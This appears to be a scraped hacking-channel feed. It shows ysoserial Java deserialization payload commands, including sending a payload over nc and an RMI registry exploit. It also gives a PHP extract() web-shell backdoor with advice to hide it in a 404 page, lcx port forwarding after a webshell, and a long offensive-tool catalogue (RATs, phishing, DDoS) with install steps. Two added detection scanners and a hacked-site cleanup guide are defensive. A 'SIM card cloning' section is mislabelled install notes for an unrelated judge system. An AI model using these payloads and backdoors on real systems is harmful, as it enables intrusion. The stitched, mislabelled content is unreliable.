UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ The first platform that collects and analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

🦑 #EXPLOITATION :

> ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.

INSTALLATION & RUN :

1) download https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
2) $ java -jar ysoserial.jar

3) Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'

4) $ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd

0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:

5) $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin

6) $ nc 10.10.10.10 1099 < groovypayload.bin

7) $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
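Added example (not part of ysoserial or of the post above): a Python scanner a defender can put in a gateway or log pipeline that recognises a Java serialization stream by its aced 0005 magic, pulls the class names out of the TC_CLASSDESC records, and flags streams whose entry class belongs to a known gadget chain. The sample bytes reuse the header and tail of the xxd output above; the serialVersionUID and field bytes in between are constructed filler, and the denylist is illustrative.

```python
from __future__ import annotations
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"   # Java serialization header: 0xACED, version 5
TC_CLASSDESC = 0x72                  # tag that precedes a class descriptor
CLASS_NAME_RE = re.compile(rb"^\[*L?[A-Za-z_$][\w$.]*;?$")  # plain or array class name

# Illustrative denylist: the first entry is the entry class of the
# CommonsCollections1 payload shown in the xxd output above.
SUSPICIOUS_CLASSES = {
    "sun.reflect.annotation.AnnotationInvocationHandler",
    "org.apache.commons.collections.functors.InvokerTransformer",
}

def extract_class_names(data: bytes) -> list[str]:
    """Class names declared by TC_CLASSDESC records, in stream order.

    Lightweight scan, not a full parser: a 0x72 tag, a 2-byte big-endian length
    and a byte string shaped like a Java class name. An 'r' inside text is never
    mistaken for a tag because two ASCII bytes give a length far above 512.
    """
    if not data.startswith(STREAM_MAGIC):
        return []
    names, i = [], len(STREAM_MAGIC)
    while i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            (length,) = struct.unpack_from(">H", data, i + 1)
            candidate = data[i + 3 : i + 3 + length]
            if 0 < length <= 512 and len(candidate) == length and CLASS_NAME_RE.match(candidate):
                names.append(candidate.decode("ascii"))
                i += 3 + length
                continue
        i += 1
    return names

def flag_gadget_classes(data: bytes) -> list[str]:
    """Names from the stream that are on the denylist (empty list = nothing to flag)."""
    return [name for name in extract_class_names(data) if name in SUSPICIOUS_CLASSES]

# Constructed sample: header and tail copied from the xxd dump above, the
# serialVersionUID and field section in between replaced by filler bytes.
SAMPLE_PAYLOAD = (
    STREAM_MAGIC
    + b"\x73\x72\x00\x32sun.reflect.annotation.AnnotationInvocationHandler"
    + b"\x00" * 8 + b"\x02\x00\x00\x78\x70"      # filler: SVUID, flags, field count
    + b"\x76\x72\x00\x12java.lang.Override" + b"\x00" * 11 + b"\x78\x70\x71\x00\x7e\x00\x3a"
)
# A benign stream of an ordinary application class (constructed name)
BENIGN_STREAM = STREAM_MAGIC + b"\x73\x72\x00\x13com.example.Invoice" + b"\x00" * 8 + b"\x02\x00\x00\x78\x70"
```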

🦑 R E Q U I R E M E N T S :

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

VERIFIED @undercodeTesting

🦑 What to do if your website is hacked and injected with gambling pages

Whenever there are competitions such as the European Cup, the World Cup and the Olympic Games, gambling groups do their utmost to hack legitimate websites, especially high-traffic information sites. Through internal testing, Baidu found that the number of sites hacked during the European Cup is rising, and Baidu has increased the efficiency and severity of its penalties. So how can a site avoid being hacked?

[Self-check: has the site been hacked?]

1. A hacked website shows a tell-tale pattern in its data: the number of indexed pages and the traffic arriving from search engines both rise sharply in a short period. The webmaster can therefore use the index volume tool of the Baidu webmaster platform to check whether the site's indexed page count is abnormal; if a sudden increase is found, use the traffic and keyword tool to check whether the keywords bringing traffic are related to the website, and whether they involve gambling or pornography.

2. Query the site with the site: search operator combined with common pornography and gambling keywords. This can reveal illegal pages that do not belong to the site.

3. Because Baidu brings huge traffic, some hacks only redirect visitors arriving from Baidu, which is hard for the webmaster to notice. So when checking whether your site is hacked, you must click through to the site's pages from the Baidu search results and see whether you are redirected to another site.

4. The site's content is marked as risky in the search results.

* Afterwards, ask the website's technical staff to confirm whether the website is hacked using back-end data and the site's code.

[How to deal with a hack]

After confirming that the website has been hacked, in addition to prompting technical staff to fix it quickly, SEO staff also need to do some follow-up and preventive work.

1. Immediately stop the website service to keep users and other sites from continuing to be affected (returning a 503 status code is recommended).

2. If several sites at the same hosting provider were hacked in the same period, contact the hosting provider and urge them to respond.

3. Clean up the hacked content that was found, make the hacked pages return 404, and submit them through the dead link submission tool of the Baidu webmaster platform.

4. Work out when the hack probably happened, compare that with the file modification times on the server, and deal with the files the attackers uploaded or modified; check the user management settings on the server for abnormal changes; change the server's user access passwords. Note: the likely time of the hack can be determined from the access log, but the attacker may also have modified the server's access log.

5. Do a thorough security job: check the website for vulnerabilities and prevent it from being hacked again.

The above is how to handle a website that has been hacked and injected with gambling pages.

@UndercodeTesting

🦑 lcx usage experience (piracy)
Example: why do port forwarding?

If the target is a server on the external network, we can connect directly to its port without any port forwarding.

Generally there are four situations:

1. This machine on the intranet, target on the external network: it can connect directly. For example, when we browse a website, we connect straight to port 80 of the external network server;

2. This machine on the external network, target on the external network: same as the example above;

3. This machine on the external network, target on the intranet of another machine: suppose we obtain a webshell and open port 3389 on that server, but when we try to connect to its port 3389 we cannot reach it. At this point an experienced person will already have checked the server's status through the webshell with ipconfig. Everyone understands this, so I will not explain it further. This is the second highlight of what I want to talk about: the idea now is to forward its port 3389, and for that we use lcx.exe.

@UndercodeTesting

🦑 #FastTips: effective and popular ways accounts get hacked :


1) Attacks at the software level
Injection of malware into the user's system, or exploitation of vulnerabilities in software already installed. This is still the most widespread and effective hacking method. The proliferation of antivirus products, built-in firewalls, mandatory UAC and auto-updates, which raise the overall security of the OS, somewhat improves the situation, but cannot protect users 100% from their own rash actions.

2) Attacks at the traffic level
There are two types of such attacks: sniffing unprotected traffic, and attacks on protected traffic (man in the middle, MITM).

a- This method of hacking is more effective than the first one, but it is technically harder to implement, so it has not become as widespread. First of all because it is limited geographically: the attack must be carried out directly on the incoming and outgoing connections, and for this you need physical access to them.

b- In the second method a secure connection is established, but not between the user's certificate and the server's certificate; instead between the attacker and the server (hence the name MITM, man-in-the-middle attack). Once the "necessary" certificate has been installed, the compromised traffic is available to the hacker in decrypted form, which allows him to extract and save credentials from it.


Incidentally, both of these methods are also used at the software level: when malware replaces a certificate, or when a software sniffer runs locally.

3) User-level attacks
Social engineering techniques, in other words deliberately deceiving a user in order to obtain credentials. The victim is misled when communicating over Internet channels or by phone, after which they hand over everything the attacker needs themselves. Despite the high labor cost, such an attack is very effective at obtaining a specific user's account.


4) Attack at the server (service provider) level
An extremely rare type of attack. It is theoretically possible, but in practice it almost never happens. Here it is worth debunking the popular myth that "the social network was hacked": in such a situation it was not the social network that was hacked but the devices of a particular user. And most likely he himself helped the attacker, who used the trick from point 1 or a combination of tricks 1 and 3. So users need not fear the "hacked social network" scenario, but should be more attentive to their own actions.
@UndercodeTesting
Hackingtool Menu 🧰
Anonymously Hiding Tools
Information gathering tools
Wordlist Generator
Wireless attack tools
SQL Injection Tools
Phishing attack tools
Web Attack tools
Post exploitation tools
Forensic tools
Payload creation tools
Exploit framework
Reverse engineering tools
DDOS Attack Tools
Remote Administrator Tools (RAT)
XSS Attack Tools
Steganograhy tools
Other tools
SocialMedia Bruteforce
Android Hacking tools
IDN Homograph Attack
Email Verify tools
Hash cracking tools
Wifi Deauthenticate
SocialMedia Finder
Payload Injector
Web crawling
Mix tools
Anonymously Hiding Tools
Anonmously Surf
Multitor
Information gathering tools
Network Map (nmap)
Dracnmap
Port scanning
Host to IP
Xerosploit
RED HAWK (All In One Scanning)
ReconSpider(For All Scaning)
IsItDown (Check Website Down/Up)
Infoga - Email OSINT
ReconDog
Striker
SecretFinder (like API & etc)
Find Info Using Shodan
Port Scanner - rang3r
Breacher
Wordlist Generator
Cupp
WordlistCreator
Goblin WordGenerator
Password list (1.4 Billion Clear Text Password)
Wireless attack tools
WiFi-Pumpkin
pixiewps
Bluetooth Honeypot GUI Framework
Fluxion
Wifiphisher
Wifite
EvilTwin
Fastssh
Howmanypeople
SQL Injection Tools
Sqlmap tool
NoSqlMap
Damn Small SQLi Scanner
Explo
Blisqy - Exploit Time-based blind-SQL injection
Leviathan - Wide Range Mass Audit Toolkit
SQLScan
Phishing attack tools
Setoolkit
SocialFish
HiddenEye
Evilginx2
I-See_You(Get Location using phishing attack)
SayCheese (Grab target's Webcam Shots)
QR Code Jacking
ShellPhish
BlackPhish
Web Attack tools
Web2Attack
Skipfish
SubDomain Finder
CheckURL
Blazy(Also Find ClickJacking)
Sub-Domain TakeOver
Dirb
Post exploitation tools
Vegile - Ghost In The Shell
Chrome Keylogger
Forensic tools
Autopsy
Wireshark
Bulk extractor
Disk Clone and ISO Image Aquire
Toolsley
Payload creation tools
The FatRat
Brutal
Stitch
MSFvenom Payload Creator
Venom Shellcode Generator
Spycam
Mob-Droid
Enigma
Exploit framework
RouterSploit
WebSploit
Commix
Web2Attack
Reverse engineering tools
Androguard
Apk2Gold
JadX
DDOS Attack Tools
SlowLoris
Asyncrone | Multifunction SYN Flood DDoS Weapon
UFOnet
GoldenEye
Remote Administrator Tools (RAT)
Stitch
Pyshell
XSS Attack Tools
DalFox(Finder of XSS)
XSS Payload Generator
Extended XSS Searcher and Finder
XSS-Freak
XSpear
XSSCon
XanXSS
Advanced XSS Detection Suite
RVuln
Steganograhy tools
SteganoHide
StegnoCracker
Whitespace
Other tools
SocialMedia Bruteforce
Instagram Attack
AllinOne SocialMedia Attack
Facebook Attack
Application Checker
Android Hacking tools
Keydroid
MySMS
Lockphish (Grab target LOCK PIN)
DroidCam (Capture Image)
EvilApp (Hijack Session)
HatCloud(Bypass CloudFlare for IP)
IDN Homograph Attack
EvilURL
Email Verify tools
Knockmail
Hash cracking tools
Hash Buster
Wifi Deauthenticate
WifiJammer-NG
KawaiiDeauther
SocialMedia Finder
Find SocialMedia By Facial Recognation System
Find SocialMedia By UserName
Sherlock
SocialScan | Username or Email
Payload Injector
Debinject
Pixload
Web crawling
Gospider

🦑 NEW UPDATE ALL IN ONE REAL HACKING

INSTALLATION & RUN :

1) git clone https://github.com/Z4nzu/hackingtool.git

2) chmod -R 755 hackingtool

3) cd hackingtool

4) sudo pip3 install -r requirement.txt

5) bash install.sh

6) sudo hackingtool

@UndercodeTesting

🦑 ODOR1 - PHP extract backdoor usage method :)
Let's introduce a new PHP backdoor: the extract function backdoor.

The code is shown below:

1) extract
(PHP 4, PHP 5)
extract: import variables from an array into the current symbol table
int extract (array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]])
This function imports variables from the array into the current symbol table, so every key of the array becomes a PHP variable of the same name.


2) Background reading:

1: Various usages of the PHP extract function
2: The PHP extract() function
3: Official documentation
4: php-backdoors-hidden-with-clever-use-of-extract-function
Now the real work begins :)

3) Server code:


<?@extract($_REQUEST);@die($err($info));?>

4) Finally, pad it out with various other code, tags and a 404 page... you know.


@UndercodeTesting
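Added example (not from the post or any of the write-ups it lists): a Python scanner a defender can run over a web root to find files like the one-liner above. It combines the two checks this page recommends, namely files modified after the suspected compromise time (step 4 of the "hacked website" section) and PHP source that feeds extract() from a request superglobal and then calls a function through a variable name. The web root, file names and cutoff time in demo() are constructed sample data.

```python
from __future__ import annotations
import os
import re
import tempfile
import time
from pathlib import Path

# Patterns taken from the one-liner above: extract() fed from a request
# superglobal, then a call through a variable function name such as $err($info).
EXTRACT_FROM_REQUEST = re.compile(r"extract\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b")
VARIABLE_FUNCTION_CALL = re.compile(r"\$[A-Za-z_]\w*\s*\(")

def scan_php_file(path: Path, modified_after: float) -> list[str]:
    """Reasons a PHP file deserves a manual look (empty list = nothing found)."""
    reasons = []
    if path.stat().st_mtime > modified_after:
        reasons.append("modified after the suspected compromise time")
    source = path.read_text(errors="replace")
    if EXTRACT_FROM_REQUEST.search(source):
        reasons.append("extract() turns request parameters into PHP variables")
        if VARIABLE_FUNCTION_CALL.search(source):
            reasons.append("variable function call: the request can choose which function runs")
    return reasons

def scan_webroot(root: Path, modified_after: float) -> dict[str, list[str]]:
    """Map each suspicious .php file (path relative to root) to its reasons."""
    findings = {}
    for path in sorted(root.rglob("*.php")):
        reasons = scan_php_file(path, modified_after)
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings

def demo() -> dict[str, list[str]]:
    """Build a constructed web root in a temp dir and scan it (sample data, not real files)."""
    root = Path(tempfile.mkdtemp())
    (root / "index.php").write_text("<?php echo 'hello'; ?>")
    (root / "uploads").mkdir()
    # the backdoor from the post, dropped where uploads are normally stored
    (root / "uploads" / "404.php").write_text("<?@extract($_REQUEST);@die($err($info));?>")
    cutoff = time.time() - 3600   # suspected compromise: one hour ago (constructed)
    old = cutoff - 86400          # the legitimate file has been untouched for a day
    os.utime(root / "index.php", (old, old))
    return scan_webroot(root, cutoff)

if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", "; ".join(reasons))
```

On a real server, replace demo() with scan_webroot(Path("/var/www"), cutoff) where cutoff comes from the access log, and review every hit by hand before deleting anything.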
Forwarded from UNDERCODE NEWS
Analysis of the evolution of the transparent tribe hacker organization
Let's see the truth #Cyberattack #Analyse
Forwarded from UNDERCODE NEWS
Free photo site Freepik reports data leak involving 8.3 million users
#Leaks

🦑 A REAL FREE SIM CARD CLONING-OPEN SOURCE :)

R E Q U I R E M E N T S :

-gcc/g++ (with 32-bit support, for compiling submissions) with C++17 support (Debian package: g++-multilib)

-MariaDB (Debian package: mariadb-server)

-MariaDB client library (Debian packages: libmariadbclient-dev)

-libseccomp (Debian package: libseccomp-dev)

-GNU/Make (Debian package: make version >= 4.2.1)

-libzip (Debian package: libzip-dev)

INSTALLATION & RUN :

1) Debian
sudo apt-get install g++-multilib mariadb-server libmariadbclient-dev libseccomp-dev libzip-dev make libssl-dev

2) Ubuntu is not officially supported; you may try it, and it may (not) work. Modern versions of some of the above packages are needed to build sim successfully.

3) Arch Linux

> sudo pacman -S gcc mariadb mariadb-libs libseccomp libzip make && \

> sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql && \

> sudo systemctl enable mariadb && sudo systemctl start mariadb

🦑 Instructions
In case you installed MariaDB server for the first time, you should run:

1️⃣sudo mysql_secure_installation
First of all clone the Sim repository and all its submodules

2️⃣git clone --recursive https://github.com/varqox/sim &&

3️⃣cd sim

4️⃣Build

5️⃣make -j $(nproc)

6️⃣Make sure that you have created a MariaDB account and database for Sim. Use the command below to create the user sim@localhost and the database simdb (when asked for a password, enter your MariaDB root password; by default it is empty, and if that does not work try running the command with sudo):

> mysql -e "CREATE USER sim@localhost IDENTIFIED BY 'sim'; CREATE DATABASE simdb; GRANT ALL ON simdb.* TO 'sim'@'localhost';" -u root -p

7️⃣Install

8️⃣make install

9️⃣It will ask for MariaDB credentials. By default, step 4 created MariaDB username sim, password sim, database simdb and user host localhost.

πŸ”ŸIf you want to install Sim in other location that build/ type

make install DESTDIR=where-you-want-Sim-to-install
Run sim-server and job-machine
make run

1️⃣1️⃣If you have not installed Sim in the default location use command:

make run DESTDIR=where-you-installed-Sim

1️⃣2️⃣You can combine building, installation and running commands into:

make all install run

1️⃣3️⃣Enter http://127.7.7.7:8080 via your web browser, by default a Sim root account was created there
username: sim
password: sim

1️⃣4️⃣Remember to change the password now (or later) if you want to make Sim website accessible to others. Do not make hacker's life easier!

Well done! You have just installed Sim. There is a sim-server configuration file where-you-installed-Sim/sim.conf (build/sim.conf by default) where server parameters like address, workers etc. are. Also, there are log files log/*.log that you would find useful if something didn't work.

1️⃣5️⃣If you want to run Sim at system startup then you can use crontab -- just add these lines to your crontab (using command crontab -e):

@reboot sh -c 'until test -e /var/run/mysqld/mysqld.sock; do sleep 0.4; done; BUILD="where-you-installed-Sim"; "$BUILD/sim-server"& "$BUILD/job-server"&'
where-you-installed-Sim = absolute path to Sim build directory e.g. /home/your_username/sim/build

ANY DOUBT ASK @Undercode_Testing
ENJOY ❤️👍🏻